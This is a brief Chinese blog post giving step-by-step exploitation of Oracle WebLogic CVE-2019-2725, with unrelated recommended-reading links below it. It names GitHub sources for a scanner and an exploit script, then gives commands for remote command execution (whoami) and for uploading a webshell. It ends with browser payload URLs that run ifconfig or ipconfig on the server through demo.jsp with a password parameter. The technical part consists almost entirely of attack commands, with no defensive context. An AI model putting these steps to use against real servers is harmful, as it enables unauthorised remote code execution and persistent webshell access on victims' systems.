漏洞验证

POC下载：https://github.com/TopScrew/CVE-2019-2725 路径kali：/POCandEXP 进入脚本目录：cd /POCandEXP/weblogic/POC 命令：python3 WeblogicScan.py 1.1.1.14 7001

CVE-2019-2725

EXP下载：https://github.com/TopScrew/CVE-2019-2725 安装所需环境：sudo pip3 install logzero

命令回显

命令：python3 weblogic-2019-2725.py 10.3.6 http://1.1.1.14:7001 whoami

webshel??l上传

命令：python3 weblogic-2019-2725.py 10.3.6 http://1.1.1.14:7001 浏览器输入payload：http://1.1.1.14:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ifconfig windows服务器payload：http://1.1.1.14:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig

推荐阅读

• 

  2021过完年回上海需要隔离吗
• 

  瘦的英语单词怎么读，高矮大小胖瘦的英语单词怎么读
• 

  迷茫和孤独，两个“可怕”的名词
• 

  为什么一些人说“中国自古恶媳妇多”？
• 

  心动的话语46
• 

  systemui 下拉分析
• 

  消防宣传日手抄报内容 消防宣传日手抄报内容的画法
• 

  现版本慎这个英雄怎么样,该怎么玩？
• 

  电脑微信提示操作频率过快请稍后再试
• 

  干冰是那种气体的固态存在形式干冰是哪种气体的固体形态
• 

  肉桂的美容功效 丰唇治痤疮能生发
• 

  q下载
• 

  15岁穿背心还是胸罩 文胸是什么
• 

  3700x相当于i几
• 

  交通事故是否安全责任事故？
• 

  背越式跳高技巧要素是什么
• 

  巴沙鱼皮要去掉吗
• 

  北齐皇帝究竟有多奇葩？
• 

  热水袋可以带上高铁吗 乘坐高铁携带物品相关规定简述
• 

  蓬莱岛在哪里 以及相关简介

• CVE-2020-16898|CVE-2020-16898 TCP/IP远程代码执行漏洞
• 【欢喜是你·三宅系列①】⑶
• 难道你仅会钻规则的漏洞吗（）
• 你不可不知的真相系列之科学
• 人脸识别|【人脸识别系列】| 实现自动化妆
• 2018-06-13金句系列7（金句结构-改编古现代诗词）
• Unity和Android通信系列文章2——扩展UnityPlayerActivity
• 乡野村趣系列之烧仙草
• Java内存泄漏分析系列之二（jstack生成的Thread|Java内存泄漏分析系列之二：jstack生成的Thread Dump日志结构解析）
• 15、IDEA学习系列之其他设置（生成javadoc、缓存和索引的清理等）